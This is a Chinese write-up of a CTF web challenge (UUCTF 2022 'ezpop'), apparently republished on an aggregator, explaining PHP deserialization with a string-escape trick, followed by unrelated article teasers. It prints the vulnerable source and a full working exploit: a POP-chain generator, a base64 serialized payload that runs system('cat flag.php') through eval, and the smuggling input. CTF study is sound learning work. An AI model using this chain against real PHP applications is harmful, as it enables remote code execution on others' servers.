[UUCTF 2022 新生赛]ezpop - 反序列化+字符串逃逸【***】

news/2024/5/19 23:20:34 标签: web安全, 安全, ctf, php, 反序列化, 字符串逃逸

[UUCTF 2022 新生赛]ezpop

  • 一、解题过程
  • 二、其他WP
  • 三、总结反思

1

一、解题过程

题目代码:

php"> <?php
//flag in flag.php
error_reporting(0);
class UUCTF{
    public $name,$key,$basedata,$ob;
    function __construct($str){
        $this->name=$str;
    }
    function __wakeup(){
   		if($this->key==="UUCTF"){
            $this->ob=unserialize(base64_decode($this->basedata));
        }
        else{
            die("oh!you should learn PHP unserialize String escape!");
        }
    }
}
class output{
    public $a;
    function __toString(){
        $this->a->rce();
    }
}
class nothing{
    public $a;
    public $b;
    public $t;
    function __wakeup(){
        $this->a="";
    }
    function __destruct(){
        $this->b=$this->t;
        die($this->a);
    }
}
class youwant{
    public $cmd;
    function rce(){
        eval($this->cmd);
    }
}
$pdata=$_POST["data"];
if(isset($pdata))
{
    $data=serialize(new UUCTF($pdata));
    $data_replace=str_replace("hacker","loveuu!",$data);
    unserialize($data_replace);
}else{
    highlight_file(__FILE__);
}
?>

  1. 分析
    起点:UUCTF(__construct)
    终点:youwant(rce)
    链条:UUCTF(key='UUCTF';basedata=反序列化数据)-> nothing(a=&$n->b;t=$o)-> output(a=$y)-> youwant(cmd=命令)
    注意点:1、UUCTF的basedata用来存放反序列化数据
        2、参数是data,通过post传参
        3、post的参数,需要通过字符串逃逸

  2. 针对此类题目,由于特点是把我们的序列化数据再次序列化,随便传个nb进去,看看到底经过二次序列化后的数据是什么样

    php"><?php
	class UUCTF{
	    public $name,$key,$basedata,$ob;
	    function __construct($str){
	        $this->name=$str;
	    }
	}
	$pdata="nb";
	$data=serialize(new UUCTF($pdata));
	echo $data;
	$data_replace=str_replace("hacker","loveuu!",$data);
	//echo $data_replace;
?>

    得到:O:5:“UUCTF”:4:{s:4:“name”;s:2:" nb ";s:3:“key”;N;s:8:“basedata”;N;s:2:“ob”;N;}
    nb之前:O:5:'UUCTF':4:{s:4:'name';s:2:'
    nb之后:';s:3:'key';N;s:8:'basedata';N;s:2:'ob';N;}
    而nb就是我们可以操作的地方

  3. 假设我们前面做的再好,比如构造好了包含basedata的序列化代码
      但是最后这段插入的位置是在nb那里,只会执行nb之后的 s:8:‘basedata’;N;
      所以我们需要把nb之后的所有给逃逸掉,重点在于把basedata重构

  4. 根据分析,先把database的序列化代码写出来(特别注意,这里要base64_encode,而不是urlencode)

    php"><?php
	class output{
	    public $a;
	}
	class nothing{
	    public $a;
	    public $b;
	    public $t;
	}
	class youwant{
	    public $cmd;
	}
	
	$o = new output();
	$n = new nothing();
	$y = new youwant();
	$n->a=&$n->b;
	$n->t=$o;
	$o->a=$y;
	$y->cmd="system('cat flag.php');";
	//echo serialize($n);
	echo base64_encode(serialize($n));
?>

    得到:
    Tzo3OiJub3RoaW5nIjozOntzOjE6ImEiO047czoxOiJiIjtSOjI7czoxOiJ0IjtPOjY6Im91dHB1dCI6MTp7czoxOiJhIjtPOjc6InlvdXdhbnQiOjE6e3M6MzoiY21kIjtzOjIzOiJzeXN0ZW0oJ2NhdCBmbGFnLnBocCcpOyI7fX19

  5. 再构造完整的语句,也就是第二步得到的nb后,将key设为UUCTF、basedata设为第四步得到的base64编码
    ";s:3:“key”;N;s:8:“basedata”;N;s:2:“ob”;N;}
    变成
    ";s:3:"key”;s:5:"UUCTF";s:8:“basedata”;s:176:"Tzo3OiJub3RoaW5nIjozOntzOjE6ImEiO047czoxOiJiIjtSOjI7czoxOiJ0IjtPOjY6Im91dHB1dCI6MTp7czoxOiJhIjtPOjc6InlvdXdhbnQiOjE6e3M6MzoiY21kIjtzOjIzOiJzeXN0ZW0oJ2NhdCBmbGFnLnBocCcpOyI7fX19";s:2:“ob”;N;}

  6. 要使这些语句能够正确反序列化,需要进行逃逸,共236个字符
    hacker = 6字符 -> loveuu! = 7字符  ——  经过变化后可以逃逸一个字符
    使用工具:在线文本重复工具 得到236个hacker拼接在前

    php">payload=hackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhacker";s:3:"key";s:5:"UUCTF";s:8:"basedata";s:176:"Tzo3OiJub3RoaW5nIjozOntzOjE6ImEiO047czoxOiJiIjtSOjI7czoxOiJ0IjtPOjY6Im91dHB1dCI6MTp7czoxOiJhIjtPOjc6InlvdXdhbnQiOjE6e3M6MzoiY21kIjtzOjIzOiJzeXN0ZW0oJ2NhdCBmbGFnLnBocCcpOyI7fX19";s:2:"ob";N;}

    1

二、其他WP

2022 UUCTF Web
直接利用脚本生成payload,更快,但是我估计我想不到

php"><?php
//flag in flag.php
error_reporting(0);
class output{
     public $a;
}
class nothing{
     public $a;
     public $b;
     public $t;
     function __wakeup(){
     $this->a="";
     }
     function __destruct(){
     $this->b=$this->t;
     die($this->a);
     }
}
class youwant{
     public $cmd="system('cat flag.php');";
}
$A = new nothing();
$A->a = &$A->b;
$A->t = new output();
$A->t->a = new youwant();
$basedata = base64_encode(serialize($A));
$data = '";s:3:"key";s:5:"UUCTF";s:8:"basedata";s:'.strlen($basedata).':"'.$basedata.'";s:2:"ob";N;}';
$hacker='';
for($i=0;$i<strlen($data);$i++)
     $hacker .= 'hacker';
echo $hacker.$data;
?>

三、总结反思

这道题目来来回回应该是做了3次。第一次自己做,在字符串逃逸的时候思路错了。第二次看答案做,跟着步骤来,也理解了,但是不确定有没有掌握。第三次做了非常久,换了几种思路做,终于做出来了!
本人水平有限,做出这道题花了不少时间,目的就是为了掌握这种反序列化+逃逸题目的解题思维,总之还是收获不少。


http://www.niftyadmin.cn/n/5072415.html

相关文章

一张图搞定英文星期、月份、季节总也搞不定的星期,月份,季节,一张图搞定,还有必用的常见搭配,再也不担心用错介词了~

一张图搞定英文星期、月份、季节总也搞不定的星期,月份,季节,一张图搞定,还有必用的常见搭配,再也不担心用错介词了~

一张图搞定英文星期、月份、季节 总也搞不定的星期&#xff0c;月份&#xff0c;季节&#xff0c;一张图搞定&#xff0c;还有必用的常见搭配&#xff0c;再也不担心用错介词了~
阅读更多...
简述CRM系统软件的作用

简述CRM系统软件的作用

销售部门作为企业重要的营收部门&#xff0c;做好企业管理意义重大。如今市场竞争激烈&#xff0c;人工管理很难兼顾。不少企业借助CRM销售管理系统优化改进工作流程中各个环节存在的问题。下面小Z来简单说说CRM系统是做什么的&#xff1f; 一、客户档案管理 通过CRM销售管理…
阅读更多...
chromium线程模型(1)-普通线程实现(ui和io线程)

chromium线程模型(1)-普通线程实现(ui和io线程)

通过chromium 官方文档&#xff0c;线程和任务一节我们可以知道 &#xff0c;chromium有两类线程&#xff0c;一类是普通线程&#xff0c;最典型的就是io线程和ui线程。 另一类是 线程池线程。 今天我们先分析普通线程的实现&#xff0c;下一篇文章分析线程池的实现。&#xff…
阅读更多...
Java应用程序中如何实现FTP功能 | 代码示例和教程

Java应用程序中如何实现FTP功能 | 代码示例和教程

原为地址&#xff1a;https://www.toymoban.com/diary/java/363.html 在Java应用程序中实现FTP功能需要使用FTPClient类和相关方法。下面是实现三个主要功能的示例代码&#xff1a; 1&#xff09;显示FTP服务器上的文件&#xff1a; void ftpList_actionPerformed(ActionEv…
阅读更多...
java学习-day21(常用类)

java学习-day21(常用类)

文章目录 回顾&#xff1a;今天的内容1.常用类1.1StringBuffer类1.2枚举类&#xff08;enum&#xff09;1.3包装类1.4Math1.5Random类1.6System类1.7Runtime【不重要】1.8Date类1.9Calendar 回顾&#xff1a; 1.为什么重写equals方法必须重写hashCode方法是因为判断两个对象是…
阅读更多...
南美巴西市场最全分析开发攻略,收藏一篇就够了

南美巴西市场最全分析开发攻略,收藏一篇就够了

巴西位于南美洲东部&#xff0c;是南美洲资源最丰富&#xff0c;经济活力和经济实力最强的国家。巴西作为拉丁美洲的出口大国&#xff0c;一直是一个比较有潜力的市场&#xff0c;亦是我国外贸公司和独立外贸人集群的地方。中国长期是巴西主要的合作伙伴&#xff0c;2022年占巴…
阅读更多...
【星海出品】ansible入门(二) playbook

【星海出品】ansible入门(二) playbook

核心是管理配置进行批量节点部署。 执行其中的一些列tasks。 playbook由YAML语言编写。 YAML的格式如下&#xff1a; 文件名应该以 .yml 结尾 1.文件的第一行应该以“—”&#xff08;三个连字符&#xff09;开始&#xff0c;表明YAML文件的开始。 2.在同一行中&#xff0c;#之…
阅读更多...
跨qml通信

跨qml通信

****Commet.qml //加载其他文件中的组件 不需要声明称Component //1.用loader.item.属性 访问属性 //2.loader.item.方法 访问方法 //3.用loader.item.方法.connect(槽)连接信号 Item { Loader{ id:loader; width: 200; …
阅读更多...
最新文章

Copyright @ 2022~2023